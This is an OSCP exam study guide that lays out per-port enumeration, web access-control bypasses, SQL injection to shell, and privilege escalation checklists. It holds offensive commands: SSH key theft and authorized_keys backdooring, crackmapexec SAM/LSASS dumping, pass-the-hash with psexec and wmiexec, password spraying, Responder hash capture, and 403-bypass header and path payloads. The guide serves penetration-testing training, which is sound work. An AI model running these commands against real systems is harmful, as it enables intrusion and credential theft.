Methodology — Offensive Security Certified
Professional (OSCP)
By: Jacob Swinsinski
Date: 08/24/2022
Goals: This document is intended to spread knowledge to anyone pursuing their OSCP
Certification. It contains notes from past experiences and an abundance of
commands/methods I have had to utilize to gain access to a targeted machine. Credit is given
where it is due.
Plan of Attack:
6 Machines — 70 Points is passing. We’re still shooting for 100 points.
3 (AD Set) — Critical — 40 Points (no partial credit)
3 Standalone — Must achieve low-priv on one box and full compromise on another.
1. Recon — Scan the entire environment.
a. Establish IP-range/scope
# Nmap
nmap -sn 192.168.1.0/24
nmap -sC -sV -O -p- -oA nmap/complete 192.168.1.0/24
# Nmap UDP
nmap -sU -O -p- -oA nmap/Complete_UDP 192.168.1.0/24
# NmapAutomator
NmapAutomator.sh -H 192.168.1.0/24 -t network -s ./nmap
What IP’s are we attacking — Place them in notes.
2. Identify and attack the AD Set first.
3. Move onto the 3 standalone next.
a. Chance of a Buffer Overflow being a low-privileged attack vector
4. Create a “working page” within your notes to store screenshots, proofs, exploits, and more for your exam report.
5. Take a break after ever flag/major step.
Methodology — Offensive Security Certified Professional (OSCP) 1
Reconnaissance/Enumeration
Recon can be broken down into two different stages: Network Enumeration and Web Enumeration.
We will begin with a methodology of what I like doing if I run into a particular port on a target.
Your goal is to obtain as much information as possible about a box.
Take your time. Review every line. Be efficient.
“ALWAYS have a form of recon in the background” ~ IPPSEC
Network Enumeration
21/FTP
File Transfer Protocol (FTP)
Anonymous access?
File read/file write?
Can we READ any sensitive files that contain hints of creds?
Can we WRITE a file and access it via browser? If so can we upload a webshell and gain access?
File upload → Execute from Web → Webshell
Attempt password checking if you found credentials from other enumeration. If so, this will allow you to be able to gain access to a higher
privileged session that can then allow write access if not obtained before.
Banner Grabbing:
nc -vn <IP> 21
Anonymous Login:
ftp <IP>
> anonymous
> anonymous
> ls -a # List all files (even hidden) (yes, they could be hidden)
> binary #Set transmission to binary instead of ascii
> ascii #Set transmission to ascii instead of binary
> bye #exit
Nmap:
nmap --script ftp-* -p 21 <IP>
#Note: This will still be done with the -sC option in nmap.
Attempt Connection via Browser — Enter the following into the URL:
ftp://anonymous:anonymous@<IP>
Note: that if a web application is sending data controlled by a user directly to a FTP server you can send double URL encode %0d%0a (in
double URL encode this is %250d%250a) bytes and make the FTP server perform arbitrary actions. One of this possible arbitrary actions is
to download content from a users controlled server, perform port scanning or try to talk to other plain-text based services (like http)
Methodology — Offensive Security Certified Professional (OSCP) 2
Downloading all files from FTP:
wget -m ftp://anonymous:anonymous@<IP> #Download all
wget -m --no-passive ftp://anonymous:anonymous@<IP> #Download all
Tools:
nmap
wget
netcat
ftp client
22/SSH
Secure Shell (SSH) is an encrypted remote communications protocol.
Attempt password checking with found credentials.
Note: This is CRUCIAL please check for password reuse as an easy win.
Brute force will 99.9% of the time NOT be the way in.
Banner Grabbing:
nc -vn <IP> 22
Config Files to look out for:
ssh_config
sshd_config
authorized_keys
ssh_known_hosts
known_hosts
id_rsa
Hijacking a user’s SSH Private Key via readable private keys:
How can you detect this?
ls -la /home /root /etc/ssh /home/*/.ssh/; /etc/ssh:
-rwxrwxtwx 1 stef stef 565 Feb 16 01:28 id_rsa
If you see the highlighted permissions, the private keys are readable and you can then hijack them:
1. cd /.ssh
2. cat id_rsa
3. copy/paste contents of id_rsa into a file in a directory named after the individual’s name you are stealing the key from.
4. nano id_rsa and paste the contents of id_rsa into here.
5. chmod 600 id_rsa
6. SSH into the machine using the following syntax:
ssh -i id_rsa <user>@<IP>
Writable Public Keys:
Methodology — Offensive Security Certified Professional (OSCP) 3
If the authorized_keys file is writable to the current user, this can be exploited by adding additional authorized keys.
How can you detect this?
ls -la /home /root /etc/ssh /home/*/.ssh/; /etc/ssh:
-rwxrwxrwx 1 stef stef 565 Feb 16 01:58 authorized_keys
The highlighted is vulnerable.
The easiest way to exploit this is to generate a new SSH key pair, add the public key to the file and login using the private key.
Generate a new SSH key pair:
# On kali:
ssh-keygen
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa.pub | xclip -selection c
Copy the public key to the host:
# On victim:
echo "ssh-rsa <pub_key_here>= kali@kali" >> /home/user/.ssh/authorized_keys
cat /home/user/.ssh/authorized_keys
Connect to the victim via SSH:
ssh user@<IP>
Note that if the key pair was not generated in the default directory for SSH, the private key can be specified using -i.
References:
https://steflan-security.com/linux-privilege-escalation-exploiting-misconfigured-ssh-keys/
https://steflan-security.com/linux-privilege-escalation-exploiting-misconfigured-ssh-keys/
23/Telnet
Telnet is an insecure-in-nature, remote communications protocol. The insecurity is due to it being implemented without the use of encryption. It
was later replaced by SSH. All communications over this protocol can be seen in clear-text over the wire using a packet analyzer such as
Wireshark.
Banner Grabbing:
nc -nv <IP> 23
Nmap Enumeration:
nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
25/SMTP
Simple Mail Transfer Protocol (SMTP) is a mailing protocol that allows hosts to send/receive emails.
Banner Grabbing:
Methodology — Offensive Security Certified Professional (OSCP) 4
nc -vn <IP> 25
Nmap Enumeration:
nmap -p25 --script smtp-commands <IP>
80, 443/HTTP(s)
Hyper-Text Transport Protocol (HTTP(s)) is a communications protocol that allows data to be fetched and received from remote Internet sources.
This protocol comes in two different forms HTTP and HTTPs. The “s” means that the protocol is encrypting communications and usually runs on
port 443.
Web Methodology:
1. Start by identifying the technologies used by the web server. Look for tricks to keep in mind once you identify key pieces of tech.
a. Is there a known vulnerability of the version of technology?
b. Is there any useful trick to extract additional information?
c. Can you utilize a specialized scanner? i.e. wpscan.
2. Launch general purpose scanners such as nikto.
nikto -h <URL>
whatweb -a 4 <URL>
wapiti -u <URL>
w3af
3. Check robots, sitemap, 404 errors, etc.
4. Run a directory bruteforce.
5. Once you have identified the web technology, use the following source to find vulnerabilities:
80,443 - Pentesting Web Methodology
known vulnerabilities for the server , : version that is running. TheHTTP headers and cookies of the response could be
very useful to identify the technologies and/or version being used. Nmap scan can identify the server version, but it
could also be useful the tools
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web#web-tech-tricks
6. CMS Scanning:
cmsmap
wpscan
joomscan
joomlavs.rb
7. Visual Inspection:
While you have a form of recon going on in the background, visit the site and click around. See what you can discover.
There are 2 main ways of enumerating a web server: directory bruteforcing and web technology enumeration.
VHOST Discovery (FFUF):
ffuf -c -ac -w ~/tools/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: Fuzz.forget.htb' -u http://forge.htb
Methodology — Offensive Security Certified Professional (OSCP) 5
Directory Bruteforcing:
Gobuster
This tool is used for enumerating DNS and web server directories via bruteforcing a pre-defined wordlist.
Directory
gobuster dir --url http://example.com --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
DNS
gobuster dns --domain example.com --wordlist /path/to/list
Web Technology Enumeration:
Banner Grabbing:
nc -v domain.com 80 # GET / HTTP/1.0
openssl s_client -connect domain.com:443 # GET / HTTP/1.0
Wappalyzer- Browser Extension
Check version numbers
Google versions for exploits
What programming language is being utilized on the web server/web app?
Nikto
Generalization tool for enumeration.
401 & 403 Error Bypasses:
403 & 401 Bypasses
Checklist - Local Windows Privilege Escalation
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/403-and-401-bypasses
https://github.com/carlospolop/fuzzhttpbypass
FuzzHTTPBypass:
./fuzzhttpbypass.py -f notcontains,403 -u http://example.com/index.php
./fuzzhttpbypass.py -f notcontains,240 -u http://example.com/index.php
./fuzzhttpbypass.py -f notcontains,Invalid -u http://example.com/index.php
HTTP Headers Fuzzing:
# Attempt to add the following to the GET request:
X-Originating-IP: 127.0.0.1
Methodology — Offensive Security Certified Professional (OSCP) 6
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Original-URL: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
Host: localhost
If the path is protected, you can do the following to attempt to bypass the path protection:
X-Original-URL: /admin/console
X-Rewrite-URL: /admin/console
Path Fuzzing (If /path is blocked):
Try using /%2e/path (if the access is blocked by a proxy, this could bypass the protection). Try also** /%252e**/path (double URL encode).
Try Unicode bypass: /%ef%bc%8fpath (The URL encoded chars are like "/") so when encoded back it will be //path and maybe you will
have already bypassed the /path name check
Other path bypasses:
site.com/secret –> HTTP 403 Forbidden
site.com/SECRET –> HTTP 200 OK
site.com/secret/ –> HTTP 200 OK
site.com/secret/. –> HTTP 200 OK
site.com//secret// –> HTTP 200 OK
site.com/./secret/.. –> HTTP 200 OK
site.com/;/secret –> HTTP 200 OK
site.com/.;/secret –> HTTP 200 OK
site.com//;//secret –> HTTP 200 OK
site.com/secret.json –> HTTP 200 OK (ruby)
Use all this list in the following situations:
/FUZZsecret
/FUZZ/secret
/secretFUZZ
Other API bypasses:
/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
{“id”:111} --> 401 Unauthriozied
{“id”:[111]} --> 200 OK
{“id”:111} --> 401 Unauthriozied
{“id”:{“id”:111}} --> 200 OK
{"user_id":"<legit_id>","user_id":"<victims_id>"} (JSON Parameter Pollution)
user_id=ATTACKER_ID&user_id=VICTIM_ID (Parameter Pollution)
Automation Tools (For Bypass):
https://github.com/lobuhi/byp4xx
Installation:
pip install git+https://github.com/lobuhi/byp4xx.git
Methodology — Offensive Security Certified Professional (OSCP) 7
Example:
python3 byp4xx.py https://www.google.es/test
110, 995/POP
Post Office Protocol (POP) is a networking and IP protocol that extracts and retrieves email from remote email servers for a client machine to
access. POP operates at Layer 7 of the OSI model (Application Layer). This provides end users the ability to send and receive email.
Banner Grabbing:
nc -nv <IP> 110
openssl s_client -connect <IP>:995 -crlf -quiet
Nmap Scan:
nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -port <PORT> <IP> #All are default scripts
POP Commands:
POP commands:
USER uid Log in as "uid"
PASS password Substitue "password" for your actual password
STAT List number of messages, total mailbox size
LIST List messages and sizes
RETR n Show message n
DELE n Mark message n for deletion
RSET Undo any changes
QUIT Logout (expunges messages if no RSET)
TOP msg n Show first n lines of message number msg
CAPA Get capabilities
Why are these commands useful:
Example use case-
root@kali:~# telnet $ip 110
+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
USER billydean
+OK
PASS password
+OK Welcome billydean
list
+OK 2 1807
1 786
2 1021
retr 1
+OK Message follows
From: jamesbrown@motown.com
Dear Billy Dean,
Here is your login for remote desktop ... try not to forget it this time!
username: billydean
password: PA$$W0RD!Z
We can see that we are able to obtain clear-text credentials from this email via enumeration of POP.
Methodology — Offensive Security Certified Professional (OSCP) 8
137, 138, 139/Net-BIOS:
Network Basic Input/Output System (Net-BIOS)
Name service for registration operates on 137.
Connection-less communication operates on 138.
Session service for connection-oriented communication operates on port 139.
Enumerating a NetBIOS service:
nbtscan <IP>/30
sudo nmap -sU -sV -T4 --script nbstat.nse -p137 -Pn -n <IP>
Tools:
nmap
nbtscan
139, 445/Net-BIOS, SMB, SAMBA
Server Message Block (SMB) is a file and drive sharing protocol that operates on the network level. Samba is the Linux version of SMB.
However, they are very similar. These technologies have been around for quite some time and are frequently used in development environments
which make them prime targets for threat actors.
SMB/NET-BIOS access generally works in 2 different ways:
Null Session- Allows authentication when credentials are not provided to the server.
Guest Session- Allows authentication as long as a VALID username is provided to the server. Note: the password is not needed
Once the authentication type is figured out, we must then figure out what kind of permissions we are granted with that type of authentication.
Read/Write, or both?
Can we find a confidential file? Does it provide credentials or a hint?
Remember, smbmap is used to map out drives, not form/establish a connection.
Meanwhile, smbclient is used to authenticate, form, and establish a connection to a remote SMB server to allow a client to manipulate the
server as they please.
Scanning a network for hosts:
nbtscan -r <IP>/24
Enumeration:
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>
#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
#You can use querydispinfo and enumdomusers to query user information
#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
Methodology — Offensive Security Certified Professional (OSCP) 9
Listing Shared Folders:
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is
smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
Connect/List a shared folder:
#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient
#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
Null vs Authenticated sessions to a Windows share:
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
Mount a shared folder:
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
Downloading files via smbmap:
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
Downloading files via smbclient (all files):
#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory
Enumerate local users with Impacket:
lookupsid.py -no-pass hostname.local
Authenticate using Kerberos:
Authenticate to Kerberos via smbclient and rpcclient
Methodology — Offensive Security Certified Professional (OSCP) 10
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
Have valid creds? Run the following lucrative commands for some juicy information:
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
psexec/smbexec:
Both options will create a new service in the victim machine and use it to execute an executable over the network.
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
wmiexec/dcomexec:
Use the following to stealthily execute command shells without touching the disk or to begin to run a new service using DCOM on port 135:
wmiexec.py:
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
dcomexec.py:
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
Tools:
CrackMapExec
enum4linux (works for SMB and Samba hosts)
smbmap
Checks what shares are available
Reveals permissions information
smbclient
Used to actively connect to the SMB server
Allows a user to access the shares allowed by the server
smbmap → smbclient
Methodology — Offensive Security Certified Professional (OSCP) 11
135/RPC
Microsoft Remote Procedure Call (RPC), is a protocol that uses the client-server model in order to allow one program to request service form a
program on another computer without having to understand the details of the computer’s network.
This can allow you to identify exposed RPC services and allow you to find additional enumeration routes or vulnerabilities linked to the
system.
rpcdump:
D:\rpctools> rpcdump [-p port] 192.168.189.1
IfId: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
Annotation: Messenger Service
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncadg_ip_udp:192.168.189.1[1028]
You can now Google the UUID for a vulnerability or known service that will aid you in enumeration.
Notable RPC Interfaces:
IFID value
Named pipe
Description
12345778-1234-abcd-ef00-0123456789ab
\pipe\lsarpc
LSA interface, used to enumerate users
3919286a-b10c-11d0-9ba8-00c04fd92ef5
\pipe\lsarpc
LSA Directory Services (DS) interface, used to enumerate domains and trust relationships
12345778-1234-abcd-ef00-0123456789ac
\pipe\samr
LSA SAMR interface, used to access public SAM database elements (e.g., usernames) and brute-force user passwords regardless of account locko
1ff70682-0a51-30e8-076d-740be8cee98b
\pipe\atsvc
Task scheduler, used to remotely execute commands
338cd001-2244-31f1-aaaa-900038001003
\pipe\winreg
Remote registry service, used to access the system registry
367abb81-9844-35f1-ad32-98f038001003
\pipe\svcctl
Service control manager and server services, used to remotely start and stop services and execute commands
4b324fc8-1670-01d3-1278-5a47bf6ee188
\pipe\srvsvc
Service control manager and server services, used to remotely start and stop services and execute commands
4d9f4ab8-7d1c-11cf-861e-0020af6e7c57
\pipe\epmapper
DCOM interface, supporting WMI
NOTE:
Remember the APT box when we had to utilize IOXIDRESOLVER to enumerate IPv6 interface information? This then led to a vast
increase in overall box attack surface? Well, the same methodology applies here.
https://github.com/mubix/IOXIDResolver
Methodology — Offensive Security Certified Professional (OSCP) 12
Username enumeration
rpcclient
rpcclient -U ‘%’ -N <IP>
Tool:
rpcclient
rpcdump
389, 636, 3268, 3269/LDAP/LDAPS
Lightweight-Directory Access Protocol (LDAP) is a software protocol that is used to enable anyone to locate resources such as files and devices
in a network. It features a secure version of the protocol “s” and an insecure version.
Nmap:
nmap -n -sV --script "ldap* and not brute" <IP>
Have valid credentials? — Ldapdomaindump
pip3 install ldapdomaindump
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]
Ldapsearch
Null Authentication:
ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
Valid Creds:
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
Tools:
CrackMapExec
Nmap NSE
ldapsearch
ldapdomaindump
2049/NFS
Open NFS’s work by utilizing read/write access permissions.
Read Access: Possible confidential file is available
Write Access: Possible file upload to execute through web service
Tools:
Mount: For mounting share availability
Showmount: For finding shares available
Methodology — Offensive Security Certified Professional (OSCP) 13
3306/MYSQL
Attempt login without password
Can be used for checking passwords found from a different service
Tool:
mysql (Client)
5985, 5986/WINRM
Windows Remote Management (WinRM) is a remote management tool that allows a user to connect to a remote machine via command-line
interface (CLI).
Provides remote access to Windows machines.
With password OR hash.
Remember that when we see these ports open, we will have a 99% chance of utilizing Evil-WinRM to connect to the box.
LAPS in use?
Use the —laps option with CrackMapExec.
crackmapexec winrm 192.168.1.0/24 -u user -p password --laps
Password Spraying:
crackmapexec winrm 192.168.1.0/24 -u usernames -p passwords --no-bruteforce
Authentication:
crackmapexec winrm 192.168.1.0/24 -u user -p password
Tools:
Evil-WinRM (Tool)
CrackMapExec
3389/RDP
Remote Desktop Protocol (RDP) is a remote management protocol that allows users to remote into a machine. Very similar to WinRM. However,
RDP grants a user access to the machine via Graphical User Interface (GUI).
Try logging in with any credentials that you have
Use different clients such as remmina if you have any errors with other clients
If logged in share folder to transfer files through remmina
161, 162, 10161, 10162/SNMP
Simple Network Management Protocol (SNMP) is a protocol that is used to monitor different devices in the network.
Access critical information about target system.
Nmap (SNMP NSE Script):
nmap -p 161 <IP> --script snmp*
Methodology — Offensive Security Certified Professional (OSCP) 14
snmp-check:
snmp-check <IP>
snmpwalk:
snmpwalk -c public -v1 $ip 1.3.6.1.4.1.77.1.2.25 # enumerate windows users
snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.4.2.1.2 # enumerates running processes
SNMP MIB Trees:
1.3.6.1.2.1.25.1.6.0 - System Processes
1.3.6.1.2.1.25.4.2.1.2 - Running Programs
1.3.6.1.2.1.25.4.2.1.4 - Processes Path
1.3.6.1.2.1.25.2.3.1.4 - Storage Units
1.3.6.1.2.1.25.6.3.1.2 - Software Name
1.3.6.1.4.1.77.1.2.25 - User Accounts
1.3.6.1.2.1.6.13.1.3 - TCP Local Ports
Tools:
snmp-check
snmpwalk
nmap
53/DNS
Domain Name Service (DNS) is a protocol that allows systems to resolve hostnames to IP addresses. This allows for computers to become much
more user friendly as users do not have to remember IP addresses (i.e. x.x.x.x) but rather hostnames (i.e. Google.com).
Can be used to get information about subdomains
Zone Transfer:
dig axfr @<DNS_IP> #Try zone transfer without domain
dig axfr @<DNS_IP> <DOMAIN> #Try zone transfer guessing the domain
fierce --domain <DOMAIN> --dns-servers <DNS_IP> #Will try toperform a zone transfer against every authoritative name server and if this does
More Info:
dig ANY @<DNS_IP> <DOMAIN> #Any information
dig A @<DNS_IP> <DOMAIN> #Regular DNS request
dig AAAA @<DNS_IP> <DOMAIN> #IPv6 DNS request
dig TXT @<DNS_IP> <DOMAIN> #Information
dig MX @<DNS_IP> <DOMAIN> #Emails related
dig NS @<DNS_IP> <DOMAIN> #DNS that resolves that name
dig -x 192.168.0.2 @<DNS_IP> #Reverse lookup
dig -x 2a00:1450:400c:c06::93 @<DNS_IP> #reverse IPv6 lookup
#Use [-p PORT] or -6 (to use ivp6 address of dns)
DIG:
dig axfr cronos.htb @10.129.227.211
DNSENUM:
Methodology — Offensive Security Certified Professional (OSCP) 15
dnsenum zonetransfer.me
NSLookup:
nslookup
> Default server: 127.0.0.1
Address: 127.0.0.1#53
> server 10.129.227.211
Default server: 10.129.227.211
Address:10.129.227.211#53
> 10.129.227.211
211.227.129.10.in-addr.arpa name = ns1.cronos.htb
Brute Forcing Sub Domains:
dnsrecon -D subdomains-1000.txt -d <DOMAIN> -n <IP_DNS>
dnscan -d <domain> -r -w subdomains-1000.txt #Bruteforce subdomains in recursive way, https://github.com/rbsec/dnscan
IPv6:
dnsdict6 -s -t <domain>
Tools:
NSLOOKUP
DIG
Dnsenum
dnsdict6
dnsrecon
Recon/Enumeration — Additional Help? References:
See something I missed?
https://github.com/swisskyrepo/PayloadsAllTheThings
Introduction
Learn to use Crackmapexec
https://wiki.porchetta.industries/
HackTricks
Welcome to the page where you will find each hacking trick/technique/whatever I have learnt in CTFs, real life apps, and
reading researches and news.
https://book.hacktricks.xyz/welcome/readme
Web Enumeration
Methodology — Offensive Security Certified Professional (OSCP) 16
Web enumeration can be broken down into Vulnerability-Specific enumeration or Framework-Specific enumeration.
Vulnerability-Specific:
SQL Injection
Reference:
PayloadsAllTheThings/SQL Injection at master · swisskyrepo/PayloadsAllTheThings
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the
application.
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
General Methodology:
Find injection point
Understand the website behaviour
Send queries for enumeration
Understanding WAF & bypass it
Dump the database
To Shell (Based on file permissions):
Reading Files:
SSH Private keys- to get information about users read /etc/passwd
PayloadAllTheThings LFI list for finding other critical information
Function LOAD_FILE(”<FILE LOCATION>”)
Writing Files:
Webshell writing in Web-Hosting directory
You can find the WebHosting Directory by using the LFI list!
For Windows, use \\<Attacker IP>\sharename\file to get hash for the user!
Fire up Responder to grab the hash!
# Be sure to watch Unknown Artist's YouTube video for proper Responder usage during the OSCP exam.
responder -I tun0
Can we put in a one-liner webshell?
Command Injection
Checking for vulnerabilities:
Windows:
Attacker:
tcpdump -i tun0 -n ICMP
Target:
ping -c 1 <attacker IP>
Methodology — Offensive Security Certified Professional (OSCP) 17
Linux:
Attacker:
tcpdump -i tun0 -n ICMP
Target:
ping -n 1 <attacker IP>
Framework-Specific:
CMS
Finding:
Source Code
Login page
Comments
Validating:
Don’t trust version numbers all the time. Sometimes just fire an exploit at it.
Always choose a GitHub exploit over anything else
Exploiting:
Validate first
Use right port to get LAN shell
Wordpress
WPscan
wpscan --url https://example.com
Other Framework
Custom exploits take place here and you might need to use a multitude of methods to find the right vulnerability path.
Attempt X-Forwarded-For when attempting to access 403 page:
X-Forwarded-For: 127.0.0.1
Privilege Escalation
Windows:
Manual Approach:
1. Check low privilege shell permission:
whoami /priv
Methodology — Offensive Security Certified Professional (OSCP) 18
Then try to exploit if applicable.
2. Check software installation directory and find suspicious programs/binaries that are installed:
a. Be sure to read the names carefully and methodically.
3. Check for weak permissions in services in its binpath:
Windows Privilege Escalation / Insecure Service Permissions
Unconfigured Windows OS services allows some users to configure them. In this case we will learn how could be
manipulate like this situations and hacked by hackers.We will use a executable file named; "accesschk.exe /accepeula"
We will use this file at the first with /accepteula parameter that doesn't shows any pop-ups for target OS side.
https://medium.com/@orhan_yildirim/windows-privilege-escalation-insecure-service-permissions-e4f33dbff219
4. Check for unquoted service path vulnerability:
a. An executable path that contains spaces and is NOT enclosed within quotes.
b. This leads to a vulnerability known as the Unquoted Service Path.
c. It allows a user to gain SYSTEM level privileges but only if the vulnerable service is running with SYSTEM level privileges (which
most of the time it is).
We can utilize PowerUp.ps1 to enumerate this vulnerability:
powershell -ep bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks
We can also search only for UnquotedServicePath:
Import-Module .\PowerUp.ps1
get-UnquotedService
References:
Windows Privilege Escalation: Unquoted Service Path - Hacking Articles
Microsoft Windows offers a wide range of fine-grained permissions and privileges for controlling access to Windows
components including services, files, and registry entries. Exploiting Unquoted Service path is one technique to increase
privileges. Unquoted Path or Unquoted Service path is reported as a critical vulnerability in Windows, such
https://www.hackingarticles.in/windows-privilege-escalation-unquoted-service-path/
5. Check for service registry permissions:
HTB: Control
Control was a bit painful for someone not comfortable looking deep at Windows objects and permissions. It starts off
simply enough, with a website where I'll have to forge an HTTP header to get into the admin section, and then identify an
SQL injection to write a webshell and dump user hashes.
https://0xdf.gitlab.io/2020/04/25/htb-control.html
6. Check scheduled tasks:
PoC Exploit For Unpatched Windows 10 Zero-Day Flaw Published Online
Hacker "SandboxEscaper" released Task Scheduler PoC exploit code for a new zero-day privilege escalation vulnerability
affecting Windows 10 operating system
https://thehackernews.com/2019/05/windows-zero-day-vulnerability.html
Methodology — Offensive Security Certified Professional (OSCP) 19
Automated Approach:
Windows:
1. PowerUp
2. WinPEAS
3. Windows Exploit Suggester
References:
PowerSploit/PowerUp.ps1 at master · PowerShellMafia/PowerSploit
PowerSploit - A PowerShell Post-Exploitation Framework - PowerSploit/PowerUp.ps1 at master · PowerShellMafia/PowerSploit
https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
https://github.com/bitsadmin/wesng
PEASS-ng/winPEAS at master · carlospolop/PEASS-ng
Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz Check more information about how to
exploit found misconfigurations in book.hacktricks.xyz Find the latest versions of all the scripts and binaries in the releases
page . Are you a PEASS fan?
https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS
Linux:
Manual Approach:
1. Check for sudoers misconfigurations:
sudo -l
References:
Linux Privilege Escalation using Sudo Rights - Hacking Articles
In our previous articles, we have discussed Linux Privilege Escalation using SUID Binaries and file and today we are
posting another method of "Linux privilege Escalation using Sudoers file". While solving CTF challenges, for privilege
escalation we always check root permissions for any user to execute any file or command by executing sudo -l command.
https://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights/
2. Check for SUID permissions:
Manual check:
find / -perm -u=s -type f 2>/dev/null
Look for binaries and cross-reference them to GTFOBins!
References:
Methodology — Offensive Security Certified Professional (OSCP) 20
Linux Privilege Escalation using SUID Binaries - Hacking Articles
In ourarticle we have discussed "Privilege Escalation in Linux using etc/passwd file" and today we will learn "Privilege
Escalation in Linux using SUID Permission." While solving CTF challenges we always check suid permissions for any
file or command for privilege escalation.
https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/
GTFOBins
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured
systems. The project collects legitimate functions of Unix binaries that can be abused to get the f**k break out restricted
